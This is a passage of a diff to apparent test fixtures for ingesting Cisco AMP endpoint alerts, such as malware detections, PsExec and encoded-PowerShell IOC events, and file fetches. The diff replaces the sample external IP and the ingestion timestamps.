found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1453,7 +1453,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Unknown", @@ -1498,7 +1498,7 @@ "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1508,8 +1508,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322455312Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", + "ingested": "2021-12-09T13:35:29.222498300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1526,7 +1526,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Unknown", @@ -1585,7 +1585,7 @@ "1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1602,8 +1602,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322457554Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587030380676000,\"timestamp\":1610618510,\"timestamp_nanoseconds\":737000000,\"date\":\"2021-01-14T10:01:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Generic.Malware.WX.9E93D282\",\"detection_id\":\"6880587021790740668\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"file_name\":\"p3fci4nu.dll\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\Temp\\\\p3fci4nu\\\\p3fci4nu.dll\",\"identity\":{\"sha256\":\"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48\"},\"parent\":{\"process_id\":6708,\"disposition\":\"Clean\",\"file_name\":\"csc.exe\",\"identity\":{\"sha256\":\"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57\",\"sha1\":\"93cf877f5627e55ec076a656e935042fac39950e\",\"md5\":\"23ee3d381cfe3b9f6229483e2ce2f9e1\"}}}}}", + "ingested": "2021-12-09T13:35:29.222502500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587030380676000,\"timestamp\":1610618510,\"timestamp_nanoseconds\":737000000,\"date\":\"2021-01-14T10:01:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Generic.Malware.WX.9E93D282\",\"detection_id\":\"6880587021790740668\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"file_name\":\"p3fci4nu.dll\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\Temp\\\\p3fci4nu\\\\p3fci4nu.dll\",\"identity\":{\"sha256\":\"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48\"},\"parent\":{\"process_id\":6708,\"disposition\":\"Clean\",\"file_name\":\"csc.exe\",\"identity\":{\"sha256\":\"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57\",\"sha1\":\"93cf877f5627e55ec076a656e935042fac39950e\",\"md5\":\"23ee3d381cfe3b9f6229483e2ce2f9e1\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1624,7 +1624,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1676,7 +1676,7 @@ "3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1686,8 +1686,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322459771Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":460392585524661250,\"timestamp\":1610618215,\"timestamp_nanoseconds\":615000000,\"date\":\"2021-01-14T09:56:55+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618215,\"start_date\":\"2021-01-14T09:56:55+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The psexec utility was executed as admin.\",\"short_description\":\"W32.PsexecAsAdmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PsExec.exe\",\"file_path\":\"file:///C%3A/share%24/PsExec.exe\",\"identity\":{\"sha256\":\"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"}}}}}", + "ingested": "2021-12-09T13:35:29.222506Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":460392585524661250,\"timestamp\":1610618215,\"timestamp_nanoseconds\":615000000,\"date\":\"2021-01-14T09:56:55+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618215,\"start_date\":\"2021-01-14T09:56:55+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The psexec utility was executed as admin.\",\"short_description\":\"W32.PsexecAsAdmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PsExec.exe\",\"file_path\":\"file:///C%3A/share%24/PsExec.exe\",\"identity\":{\"sha256\":\"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T09:56:55.000Z", @@ -1708,7 +1708,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1762,7 +1762,7 @@ "5ca4bef8de6def53519d4b22632675bb4c1e470b" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1776,8 +1776,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:13:59.322461976Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610611000,\"timestamp_nanoseconds\":758406329,\"date\":\"2021-01-14T07:56:40+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", + "ingested": "2021-12-09T13:35:29.222510400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610611000,\"timestamp_nanoseconds\":758406329,\"date\":\"2021-01-14T07:56:40+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", "code": "553648173", "kind": "alert", "action": "File Fetch Completed", @@ -1798,7 +1798,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1845,7 +1845,7 @@ "a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1855,8 +1855,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322464211Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136035192884000,\"timestamp\":1610603346,\"timestamp_nanoseconds\":403000000,\"date\":\"2021-01-14T05:49:06+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610603346,\"start_date\":\"2021-01-14T05:49:06+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"}}}}}", + "ingested": "2021-12-09T13:35:29.222516300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136035192884000,\"timestamp\":1610603346,\"timestamp_nanoseconds\":403000000,\"date\":\"2021-01-14T05:49:06+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610603346,\"start_date\":\"2021-01-14T05:49:06+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T05:49:06.000Z", @@ -1877,7 +1877,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1926,7 +1926,7 @@ "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1936,8 +1936,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:13:59.322466602Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515350231459808800,\"timestamp\":1610584664,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-14T00:37:44+00:00\",\"event_type\":\"Threat Detected in Low Prevalence Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\"}}}}", + "ingested": "2021-12-09T13:35:29.222522400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515350231459808800,\"timestamp\":1610584664,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-14T00:37:44+00:00\",\"event_type\":\"Threat Detected in Low Prevalence Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\"}}}}", "code": "1107296278", "kind": "alert", "action": "Threat Detected in Low Prevalence Executable", @@ -1958,7 +1958,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2004,7 +2004,7 @@ "5ca4bef8de6def53519d4b22632675bb4c1e470b" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2018,8 +2018,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:13:59.322468873Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610584030,\"timestamp_nanoseconds\":579890366,\"date\":\"2021-01-14T00:27:10+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", + "ingested": "2021-12-09T13:35:29.222528100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610584030,\"timestamp_nanoseconds\":579890366,\"date\":\"2021-01-14T00:27:10+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", "code": "553648173", "kind": "alert", "action": "File Fetch Completed", @@ -2040,7 +2040,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2072,7 +2072,7 @@ "Demo_AMP_MAP_FriedEx" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2082,8 +2082,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:13:59.322471084Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583671182384431000,\"timestamp\":1610582528,\"timestamp_nanoseconds\":614000000,\"date\":\"2021-01-14T00:02:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "ingested": "2021-12-09T13:35:29.222533800Z", + "original": 